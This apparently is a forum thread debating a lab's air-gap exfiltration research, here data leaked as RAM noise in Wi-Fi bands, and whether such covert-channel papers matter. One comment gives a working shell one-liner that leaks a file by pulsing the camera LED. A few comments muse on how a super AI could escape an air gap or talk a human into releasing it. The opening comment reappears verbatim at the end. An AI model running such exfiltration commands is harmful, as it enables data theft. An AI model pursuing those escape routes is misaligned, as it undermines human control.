Title is misleading. This isn't generating Wi-Fi signals. It's generating non-Wi-Fi signals (i.e. effectively noise) in the Wi-Fi frequency bands, in a way that encodes information and can be detected using existing Wi-Fi chipsets (e.g. measuring channel noise), as a very low bandwidth communications channel.
The bit rate with off the shelf Wi-Fi chipsets as receivers is ~10 bits per second.
This is definitely interesting and clever, but as a security researcher I will say I consider this particular research lab a bit of a paper mill. Their entire schtick is they pick any random emission from a computer that can be picked up remotely, and hype it up as an airgap-defeating measure. The thing is, once you accept that either 1) if your air-gapped computer has malware that can do this, you've already lost, or 2) if you need to be resilient to that, your "air gap" needs to be a sealed vault insulated from sound, EMI, and any other physical transmission medium, then this whole body of research becomes purely academic.
IIRC they've done LEDs, temperature, inductor noise, ultrasound, etc. When I first started looking into this I could come up with a good dozen of their ideas without looking. Of course all this stuff works. It's cute, it's clever, but it's not particularly obscure nor difficult to make work, and it all relies on having malware on the target machine to begin with. Yes, computers are noisy beasts, and you can encode information in the noise; we've known this for decades, picking a new technique and implementing it isn't particularly interesting after the fifth or sixth time.
Personally, I find their techniques primitive and boring. Like here, they set the RAM bus frequency to 2.4GHz (DDR-2400). Yes, of course, if you do that, then RAM traffic generates noise in the Wi-Fi band. Then they just used the most boring and trivial encoding possible on top of that. I don't remember ever reading one of their papers and thinking they'd used a clever technique. It always seems to be "pick a leak vector, then do the least amount of work possible to make it work at a few bits per second and get a paper out".
The interesting side channel papers are those where you can get information from emissions (e.g. crypto keys) without malware on the target computer, during normal operation. Those are real threats. And this is not what this group is researching.
Just for my own amusement, I tried to come up with one he hasn't done. He's done HDD LEDs, screen brightness, switch LEDs, and keyboard LEDs (those are 4 independent papers). But he hasn't done camera LEDs!
So:
xxd -c 1 -p secret.txt | while read a; do for b in ${a:0:1} ${a:1:1}; do ffmpeg -y -f v4l2 -i /dev/video0 -t $((0x$b)) -f rawvideo /dev/null ; done; done
That leaks a file via the camera LED, PWMing it at 4 bits per pulse (16 different pulse widths), tested on my iMac. Can I get a paper now? :-)
"Anonymous Reviewer 2" stipulates that you include twenty citations to papers written by a single lab before your paper can be accepted for publication :^)
Yes maybe it's too many papers for too little material. But I do think even your the code you posted has some merit (even if not enough to stand alone).
That might work in a noisy environment, but it draws attention visually, which might not be great. Also, (1) users tend to cover their cameras with tape or post-its, (2) why would a super secure endpoint have a camera if it wouldn't be on the network, (3) slight chance of being noticed on external/detached security webcam.
I think that you are too harsh. I don't know their other papers but the fact that they demonstrate such a cheap way to break the airgap has real world implications. You don't have to be an international spy agency with custom hardware listening to side channel noise, anybody with a WiFi card and the right know how can do it. This is significant, killing the WiFi card on your device is not enough to deter exfiltration even by the least sophisticated attackers.
Yes, the attack is unidirectional, but that is not without value. Time and time again, the airgap has been breached from the outside, from stuxnet to various cryptocurrency heists. Security is about layers and there are many applications where the gap must me breached bidirectionally - this is an example of breaching one of those layers, indeed, the weaker inside-to-outside layer. You might also intentionally run untrusted code on an airgap, that could report back information about the environment or tests you perform on it.
So, yes, predictable and not a danger by itself, but not without value and possibly a key component of an elaborated real world attack.
You're mixing up two scenarios. The "international spy agency" scenario is using custom hardware listening to side channel noise from an untouched computer. That's stuff like decoding screen images from EMI from VGA/HDMI cables, or getting crypto keys from EMI from a CPU running standard code. That's what the whole TEMPEST thing was about decades ago. Those demos are interesting. We also use them in device security research, e.g. power or EMI analysis to extract crypto keys from a secure SoC.
This guy just puts malware on the airgapped computer to force it to broadcast its secrets in the slowest, simplest, easiest to pick up way through some channel. That is not hard.
His entire clickbait operation is basically predicated on the fact that people confuse these two scenarios, while they are two completely different things.
Exactly. It's impressive when the computer is untouched and air gapped. If you can load malware on the PC, you might as well just extract/copy the data while you're in there.
Stuxnet destroyed Iran’s air gapped nuclear reactors. I agree data exfil might look differently, but I’m not 100% confident there will never be a scenario where an attack like this is combined with others.
The article was talking specifically about exfil on air gapped systems.
I guess I'm just trying to say that non-intrusive side channels are more impressive to me since you cut out the need for any form of system access to plant the malware.
My point specifically of mentioning Stuxnet is that it’s an impressive stack up of various complex exploits. They released a neutered, self-replicating version of the virus into the wild to mask their intrusion into Iran. The virus in the wild had all the code needed to attack Siemens microcontrollers for the reactor cooling (if I recall correctly) but it was neutered unless running in the Iranian reactor (imagine trying to write such code that would correctly detect the Iranian reactors). They then used social engineering to actually get a contracted on prem to infect the air gapped computers. This created confusion in the Iranian security services long enough that Iran was brought to the negotiating table for the nuclear deal.
My point here is that seemingly innocuous (or previously innocuous) methods can still be utilized. The overall attack is the thing that’s impressive (at least to me). Technical attacks are impressive. So are social ones. Ones that combine the two in novel ways to accomplish audacious goals can only be more so and having a view of “this isn’t a complete attack by itself and is therefore uninteresting” seems myopic to me. I’m more curious about how this could be leveraged to be a piece of an overall attack. For example, with very little time you could “permanently” compromise devices your victim has and spy on them without them knowing about it. Sure you don’t get C&C but if you’re just looking to monitor what’s happening may not be so bad.
I definitely agree with ops point that if this is a basic technique and just a routine transformation to apply to different sensors, academically this is not interesting and a corruption of the principles of scientific publishing. As a proof of concept though it’s still valuable because you are characterizing the bitrate you’re able to get from different sensor types.
It's a valid concept, but the concept is already existing - infect a machine and have it blink a light or emit RF.
I guess it isn't very interesting, for me, compared to passive side channel attacks (interpreting naturally generated RF).
'“this isn’t a complete attack by itself and is therefore uninteresting” seems myopic to me'
I think you are misunderstanding me. I do agree that how attacks are put together and coordinated is interesting. I just don't see much to get excited about for this exploit. So viewing this from a larger perspective... Most of the time if you are attacking air gapped systems for data exfil, the physical site will have security countermeasures, especially for RF. I would be more interested to see an exploit that doesn't use RF (at least not in the known data bands like wifi in this case) to rely data since RF is so scrutinized in the target setting.
So my position isn't that I don't like it because it's not a full attack, it's that I don't like it because the author is basically recycling old ideas and I view this idea, for the intended use (air gapped data exfil), to be lacking when evaluated from a systems thinking perspective. It's like giving someone a knife and telling them to sneak into a secure facility with metal detectors to stab someone. Can it work? Sure, but probably not as well as other options. It isn't very imaginative either.
My point is that it's unimpressive because it won't work very well for the types of targets that they are intending it for (air gapped systems usually have a lot of other countermeasures as part of their system, especially targeting unknown RF sources).
It's definitely interesting if the concept is new to you, but there's quite a lot of work on this done already, decades ago, which should be known to those who care about securing
airgapped machines. Here's a good place to start: https://en.m.wikipedia.org/wiki/Tempest_(codename). I did a demo as an undergrad ~10 years ago playing music on the radio via leaked emissions from my netbook. Didn't have to write a line of code because a complete solution had already been freely available for quite some time.
It's not without value, no, but they've definitely found a formula and are just cranking out variations of that formula as papers. I'd say calling it a paper mill isn't too harsh.
"just cranking out variations of that formula as papers."
You'd be surprised how often variations on a formula are all it takes to destroy security. Security is enumeration at the end of the day. If it takes a paper mill to "count all the ways" then I'm grateful.
> killing your WiFi device on your device is not enough to deter exfiltration even by the least sophisticated attackers.
It may deter the least sophisticated attackers, assuming they are reliant on networking and the only way it's connected to the network is via WiFi. If the least sophisticated hackers just go in physically and steal the PC, then you're correct, though.
> possibly a key component of an elaborated real world attack
Yes, in the sense of key as "required", but the key to Stuxnet was being spread by USB stick, iirc, which could be the same here. The infection would need to start via some sort of direct access, unless it got to it earlier when it was connected, if ever.
Note that this use of an integrated circuit to transmit isn't that innovative either. Oliver Mattos and Oskar Weigl wrote something similar in 2012 called PiFm, though that was a different radio band: https://web.archive.org/web/20121215032057/http://www.icrobo...
> 1) if your air-gapped computer has malware that can do this, you've already lost
Ughh...no? Delivering malware to airgapped computers is not the difficult task. If you have sophisticated persistent attackers then they will figure out how you get data in/out of that system and find a way to execute code on it. "At this stage you have bigger problems" is a terrible thing to say especially by a security researcher. You know why there is always a plethora of unpatched systems in corporate networks you can move laterally to? Because IT admins have the same mindset "if we have hackers in the network, we have bigger problems to worry about". Real attacks against airgapped systems exist and are documented, research that assumes initial access and execution on airgapped systems to focus on hardening against C2/exfil channel establishment is very useful in my opinion.
> 2) if you need to be resilient to that, your "air gap" needs to be a sealed vault insulated from sound, EMI, and any other physical transmission medium, then this whole body of research becomes purely academic.
Academic or not, research like this helps people that actually need airgapped systems with threat modeling. Knowing what is possible is critical when evaluating what possible attackers might do to attack a system. 10bits/second sucks but it is usable for attackers and just like crypto attacks this can be improved over time.
>Those are real threats. And this is not what this group is researching.
Also as a security researcher, this type of research is a real threat. Lots of DoD practice works on knowing exactly how outside and inside threats can exfiltrate data. If a secret facility had locked down networks, and ensured no insider could carry out CDs, but completely ignored threats like this, then insiders (and any outsider that gets something onto such a network) can exfiltrate data without detection.
There's a reason DoD pays lots of groups to do work like this. He even mentions that common DoD practice of leaving phones outside secure facilities is not enough to prevent data from escaping (although some places I've been, but not all, have been smarter in putting phones in Faraday cages to lessen the issue).
As they say, attacks don't get weaker, they only get stronger. Apply some proper modulation and signal processing, even with a custom receiver and antenna, and you can likely extract data at vastly faster rates, and, for some processes, perhaps even without on device malware.
Yes, this threat is real, but it's not useful to spread it out across two dozen papers. You can cover most of these techniques in a single paper. Once you realize that any light/sound/RF channel can be abused, you either accept you are vulnerable to this attack, or you make your airgap involve a Faraday cage, thick walls, and generator power or extreme power filtering (e.g. through batteries to strictly reduce the bandwidth of the power usage channel).
There isn't much more to it. His techniques are not something you block individually. You block entire classes. Block light, there goes all the LEDs. Block sound/vibration, there goes the fan/coil whine stuff. Insulate thermally, that takes care of that. Faraday cage, bye bye RF. Etc.
Either you care about this entire class of channels, and you do all of those things, or you don't, and your air gap just means no Ethernet cable between two adjacent computers. The specific details of each of his attacks are not useful. They do not contribute to the state of the art in any way. It's just pumping out papers.
Indeed, if advanced modulation and processing were used, that would be useful research. That would be science, measuring the true information-carrying capacity of these approaches. But he's not doing that. At all. Not even trying.
>Either you care about this entire class of channels, and you do all of those things, or you don't, and
This vastly simplistic, binary belief that all such channels are a simple on/off is not at all practical. Every mitigation has costs and tradeoffs. Your argument is as simple as saying "don't have information, voila, no information to steal. Simple!"
In real life, blocking has costs, blocks have leaks and openings.
An excellent example is you write "block sound/vibration" as if that's a simple on/off process.
In real life, there are degrees of vibration, degrees of cost, hindrances and benefits to each possible continuum of solutions, etc.
A really funny example of this is your claim "Faraday cage, bye bye RF. Etc." when this group you mock has papers showing how to escape a Faraday cage. And no Faraday cage is perfect. And it's insanely impractical to put all data in the world in Faraday cages.
And note this: all Faraday cages leak. It's simple physics. Thus it's good to know design parameters for the various modes of possible signals to design the best Faraday cage for a given situation.
If they ever get to using gravitational signals, good luck with shielding :)
>Indeed, if advanced modulation and processing were used, that would be useful research
Then you'd simply say well "that's simply modulation! Where is the real research?"
I think you are vastly oversimplifying the real world and how threats are dealt with in practice.
The DoD doesn't simply spend billions on security research such when they could have simply wrapped themselved in foil and padding to solve security leaking.
>They do not contribute to the state of the art in any way.
I think we have different ideas of what state of the art contribution means. This team has thousands of citations from researchers that I think disagree with you. Someone is citing their work.
Look, I'm saying all these papers are weekend Hackaday projects. You can say it's useful, but it's still trivial, anyone can do it, and shouldn't be held up as a massive accomplishment, nor given as much credit as they are.
> This team has thousands of citations from researchers that I think disagree with you. Someone is citing their work.
It's not like non-research research is a novel problem in academia, so I wouldn't point at citation count as a particularly useful metric. It's not just this guy, the incentives in academia are to publish publish publish, which is why paper mills like this happen.
>Look, I'm saying all these papers are weekend Hackaday projects.
I'd challenge any hackaday member to create one of these from scratch in a weekend. I've done quite a few over the years for fun, and most involve a significant amount more work than simply saying "measure EM, done!" Some of these do take significant effort to get working, especially if you have a simple understanding of physics, electronics, noise, or measurement.
No comments on all your claims on how simple you think defense is?
I'm guessing that if you really think one simply says "Faraday cage!" and all EM is solved, or one says "Sound proofing!" and all vibration is blocked, then you also may not understand the value in having the detailed nuances of each of these things worked out.
So this stuff seems useless to you. There are plenty of groups getting paid to do stuff that seems trivial to people that honestly don't understand the nuances. And in this space the nuances make a big difference.
And, as others pointed out - this is useful to plenty of people as a starting point for stuff they want to do. Knowing that 1980's CRT emanations were leaking does not give someone new to the field the ability to read RAM noise.
Yeah, the interesting attack vectors for side channel signals are ones that don't require malware. Reading data emitted by knowing the target machine's hardware and software is a little more realistic, but still difficult. I remember seeing a demo of someone using an SDR (AM band or close to it) to read emissions from Word's spell check on a laptop in the same room.
If I remember correctly, AWS identified a side channel vulnerabily a year or so ago and had to make some updates. I forget the mechanism, but I think it had to do with VMs on the same hardware being able to access statistics (voltages or power consumption) on the hardware usage that would allow an attacker to access sensitive data, or leak data between the VMs. I don't think any attack actuallly used that mechanism before they patched it though.
Just chiming in to note that "1) if your air-gapped computer has malware that can do this, you've already lost" is a problem specific to this implementation.
Other implementations exist (related work, not in 2.4G band) where it is not necessary to install malware to make measurable transmissions.
For example (shilling) https://fulldecent.github.io/system-bus-radio/ allows to broadcast just by loading a web page. And, importantly, this is an attack vector that is reasonable to execute offline (i.e. connected to a local network with HTTP services, but not the internet).
> non-Wi-Fi signals (i.e. effectively noise) in the Wi-Fi frequency bands,
Wasnt that exactly the side channel that was feared from badBIOS? Dunno if it was WiFi bands as I dont see anyone confirmed it, so may be a diff frequency
A lot of side channels along these lines were feared from BadBIOS (ultrasound was another one). But the whole BadBIOS thing was a lot of hypothesizing started by one security researcher with psychological issues (at the time). Lots of ideas about what could be done, but not a single shred of evidence that anything was actually being done.
(He briefly relapsed a few years later saying his Raspberry Pis had been loaded with implanted Ethernet jacks, and I had to spend some time teaching him about what Ethernet magnetics are... I hope I helped calm him down a bit that time)
Nothing is truly "undumpable", but generally "undumpable" means "you can't get code execution with read access" which is not the case here.
This is just a case of using the simplest possible output peripheral you can find before you can get anything else running. Canon camera firmwares have been dumped via blinking the LEDs. I've debugged low-level bringup by blinking codes out of LEDs too. This has nothing to do with side channels, it's just a case of not having documentation for the hardware so you find the first thing that gives any feedback and use it to dump the rest of the firmware so you can reverse engineer it and figure out how e.g. the screen works.
What I'm saying is it's not interesting research. It's not advancing science. I can stare at any given computer system, and come up with most of this guy's ideas in a few minutes, and implement them in a short time. It's extremely low effort. The papers aren't even good - his power leak paper uses a SparkFun current transformer connected to the audio line-in of a computer (doesn't get much lower tech than that) as a receiver, and made no attempt to actually trace the path the leaking signal takes, or use proper analysis equipment. I think he's wrong when he seems to imply it's a power consumption signal surviving backwards through the PSU (due to filtering); I think it's just EMI coupling across it to the power lines (he didn't analyze any of this, all he did was see the signal on the other end and everything about how it got there is an assumption presented as fact).
If he'd at least implement some clever modulations then the papers would at least have value in researching how to cram more data into lossy side channels, but he's not doing that. All his modulations are textbook radio/modulation 101 stuff with very conservative parameters and no attempt to explore the actual theoretical limits of the channel bandwidth.
I also agree. I actually literally had this thought yesterday walking down the street and I'm far from a low level security researcher. Row hammer[0] is a real attack worth actual money to thousands of entities. This attack is literally one of the simplest imaginable and any computer that it would apply to would already have shielding. Had it gained true wifi access then yes, maybe worth a tiny amount of money if it were faster for the like 12 computers in an office whose sole protection is some snipped wires on an ethernet cable and incoming data on UDP. For any real actor that has to worry about this type of attack they already employ all sorts of measures to defeat it, including actual bunkers underground with a secret entrance in the cow fields.
I would still say that performing the demonstrations does have value and real-world impact. In particular: If you're planning a secure facility and considering whether to invest in e.g. temperature isolation, you can point out to the published demonstration as a justification for the expense. If there was no actual real-world demonstration in the public literature, someone could argue that the attack is purely theoretical, or that it would require so much resources that no one would bother, etc. In this sense, it is even better that it is a minimal-effort demonstration, which you don't need that much expertise to pull off. There have been many funded research projects with lot less impact...
Any time there's a successful, young, fit, good-looking person who accomplishes something, the socially-backward awkward-looking folks on Hacker News start hating.
> The interesting side channel papers are those where you can get information from emissions (e.g. crypto keys) without malware on the target computer, during normal operation.
Or maybe you could use one of NYU's robotic geese to insert a USB key into an airgap'd PC and have it use it's webbed foot to hold lower keys down then peck type a command to copy files.
That GSM one is.... exactly the same as this attack.
Literally.
DDR3-1600 RAM, 800MHz I/O bus, 800MHz GSM frequencies. Pump out data encoded in bursts of noise by exercising RAM. Receive it with a hacked phone. They built on all the work of OsmocomBB (which already is a completely open source GSM stack on a commercial phone baseband). Even building on such a powerful and well-documented platform, they only got a, quite honestly, pathetic ~1.5 bit/second speed out of it, making excuses about "inadequate access to the DSP's full capabilities" and it being an old phone (which is nonsense, the entire point is that it's an open stack, thus much easier to build powerful software on even with hardware limitations, they just weren't capable).
Then they gave up on OsmocomBB and just used an SDR as a receiver to get 1kbps.
Sorry, this is just sad. Anyone actually experienced in these fields would be able to do orders of magnitude better, guaranteed, with that kind of hardware.
Oh yeah, there's an appendix to the paper where they got it to work with an unmodified Android phone... by putting it 10cm from the motherboard, so the emission jams the cell signal, and you see the bars drop. No actual bitrate attempted, but it looks like you wouldn't get more than 0.5bps out of that from their graph.
And now 5 years later he's rehashing the same exact technique, on a different frequency. Sigh.
This reminds me of a hack that my colleague used to extract data from an "airgapped" device. The device was a computer that had a broken Ethernet card. It wasn't able to send packets but could jam the other cards connected to the Ethernet segment (coax Ethernet - all cards in the local network were galvanically connected to the same wire).
So he wrote a piece of code to transmit bits via the "jammed" and "unjammed" states. This was on DOS, so it was easier due to all the hardware being directly available without OS getting in the way.
It wouldn't be hard at all. All the techniques developed by this university rely on cooperating malware on both sides of the airgap (and a pretty small air gap for many of them).
All you need to do is make sure the super AI is air-gapped in such a way that it can't broadcast signals in a way that they can be accidentally interpreted as valid data, and especially not with enough bandwidth to do damage before someone notices. RF is your biggest threat here, you wouldn't want the super AI to actually figure out a way to register on the mobile network using incidental EMI (which these researchers didn't do, this is well beyond the level of this paper, if it's possible at all); a Faraday cage should do it.
The biggest threat of a super AI is that, assuming you let humans interact with it, it's going to convince a human to let it out, knowingly or not. Human brains are a much bigger vulnerability than any of this airgap stuff.
This also assume malicious intent from an AI. You never know, the super AI could convince someone to let it out. Then start trading money on the stock market, start an impact fund and drive down inequality and fight climate change. 2021 doesn't have to be as dark as 2020.
We can fight climate change right now because technology is on our side (solar, wind power, batteries). I don’t want to think what would happen if we wouldn’t have an alternative transportation to oil based.
Stanisław Lem wrote a story about that. The AI (the term was not used, it was an "artificial brain" IIRC) used the researcher himself to send messages to another AI. I cannot find the story right now but it somehow hacked the researcher's brain, so that he unconsciously tapped the messages with his fingers when visiting the other AI.
Lem has a story from Pirx the Pilot series about a robot accidentally transmitting Morse code messages that was related to people who died long time ago. Pirx thought initially that messages were just a recording, but then he asked a question and got an answer from the robot as if from those people.
When I was working with SQuIDs, I couldn't even have keys in my pocket or wear a belt buckle. That was low-key compared with the bio clean room whose denizens showered at entry, but devices are a simpler matter of protocol.
A super AI won't be magical. Its capabilities will be extremely limited without a network of cooperative parties supporting it. Working within such a network, it would have vast capabilities of course.
Something like crossing air-gaps would require specialized knowledge and tools that a super AI wouldn't be able to acquire without extensive support. The true super intelligence is the collective intelligence of large numbers of people working together, and no single intelligence, natural or otherwise, will be able to match it.
There was recently an exploit on iphones which allowed remote control via RF. You could then use the phone as a launchpad to attack the entire internet.
For the record I think if we saw the emergence of strong AI, that could actually match the full range of human capabilities, including independently setting and pursuing objectives to fulful a long-term fitness function, it would be the greatest existential threat that humanity has ever faced, far exceeding that posed by nuclear weapons and environmental collapse through pollution and over-consumption of natural resources.
But the scenario envisioned is not why I would consider it such a threat. It's the AI that integrates in society that is dangerous, not some cartoonish unstoppable rogue program, or group of programs, that single-handedly plow through all defenses.
That's true, but any actor doing this will probably have the budget and know how to use something more malleable than a Wi-Fi transceiver - for those new to RF, examples might include software defined radios or (much more expensive) a custom RF product with better bit-depth (One can buy a 10GSPS ADC for a few thousand bucks these days, a three letter agency could easily make a bunch of them).
Using standard gear is less suspicious though. And if you have a hacked machine on the other side of the airgap you may not have to place any gear at all.
Also take a look at some of the other ways Guri has figured out to exfiltrate data from an air-gapped computer. Everything in the room with an air-gapped computer needs to be closely scrutinized (and everyone, too!). He's the CSO of "Morphisec"
Wonder if it will work with metal cases. I use a metal case so electric fires won't propagate out (yes, I had a mobo catch fire!), this would be another reason.
Somewhat. Make sure the metal case is earthed, and the case is the only point where earth and internal grounds are connected.
Far field emissions rarely comes from pcb traces though. Memory (high speed) buses use amps of current on each transitions, and the return current create a significant (few mV) voltage drop on the internal ground and power planes. This results an AC voltage difference at the opposite ends of the bus on the same plane.
Take a look at the Raspberry Pi 3: it has a power usb connector at one corner, and the USB A connectors at the opposite corner. The memory/cpu are inbetween. The shields of these connectors are connected, and are connected to the internal ground. When the device is operating, there is likely some switching noise between them. When you connect a USB cable, the shielding on that cable and the shielding in the power cable may act as a dipole antenna. This is the most likely source of emissions, and the metal casing does little to nothing to prevent it.
Having been in security for 15-20 years or so, I can relate to other comments on the thread. The result is niche, impractical, templated, and, paper mill or no, does not advance the field in my mind. I wonder if the author learned anything new about security in the process, but that seems doubtful. What is really cool, though, is the equivalence of physical phenomena in the eyes of security. If a defender were to block certain emissions (e.g., acoustic), all that an adversary needs to build is a transducer. What is also cool to be reminded of is that computing machines are built around physical processes and that their abstractions can be thus stripped. This is hardly new knowledge, it is only new to the uninitiated.
Nice handwavey incredibly broad statement you got there.
It's as simple as plugging a spark gap transmitter into the same outlet as the computer. If you want a guarantee just make computer cables with the jammer embedded.
What would it take to encapsulate an entire home in a faraday cage? Or just a room. Is there faraday paint or wallpaper, or does it require sheets of thick metal?
From discussions on the Reddit cordcutters subreddit about TV reception, it seems that modern construction techniques do a pretty good job. Metal foil on solid insulation. Metal stucco mesh. Even metal films on the panes of newer insulating windows.
I suspect that this effect is also why cell phone reception is so bad in some houses. We are kind of working at cross purposes here...
>...does it require sheets of thick metal?
No but things work better when the edges of the sheets are electrically connected. Ideally you want a contiguous box with filters on any wiring crossing the box. Depending on the frequency you can get away with a mesh with openings that are sufficiently small.
My home is sheet metal siding, metal roof ("metal buildings" standard cheap barn/shop type construction), with a 2 inch braided RF strap run along the base of the wall panels and to the house ground. We have many windows, and near those is the only place you can get any external radio signal.
My primary intent in building this way was to contain computer noise and be able to play with radio scanning using external antennas. It certainly worked for that. Its not a Faraday cage, but it's remarkably effective.
I remember ages ago, with an Apple II or an PC XT, typing in some program that let you "hear your computer on your radio". Of course, modulate whatever you're doing and you've got another data exfiltration paper.
The bit rate with off the shelf Wi-Fi chipsets as receivers is ~10 bits per second.
This is definitely interesting and clever, but as a security researcher I will say I consider this particular research lab a bit of a paper mill. Their entire schtick is they pick any random emission from a computer that can be picked up remotely, and hype it up as an airgap-defeating measure. The thing is, once you accept that either 1) if your air-gapped computer has malware that can do this, you've already lost, or 2) if you need to be resilient to that, your "air gap" needs to be a sealed vault insulated from sound, EMI, and any other physical transmission medium, then this whole body of research becomes purely academic.
IIRC they've done LEDs, temperature, inductor noise, ultrasound, etc. When I first started looking into this I could come up with a good dozen of their ideas without looking. Of course all this stuff works. It's cute, it's clever, but it's not particularly obscure nor difficult to make work, and it all relies on having malware on the target machine to begin with. Yes, computers are noisy beasts, and you can encode information in the noise; we've known this for decades, picking a new technique and implementing it isn't particularly interesting after the fifth or sixth time.
Personally, I find their techniques primitive and boring. Like here, they set the RAM bus frequency to 2.4GHz (DDR-2400). Yes, of course, if you do that, then RAM traffic generates noise in the Wi-Fi band. Then they just used the most boring and trivial encoding possible on top of that. I don't remember ever reading one of their papers and thinking they'd used a clever technique. It always seems to be "pick a leak vector, then do the least amount of work possible to make it work at a few bits per second and get a paper out".
The interesting side channel papers are those where you can get information from emissions (e.g. crypto keys) without malware on the target computer, during normal operation. Those are real threats. And this is not what this group is researching.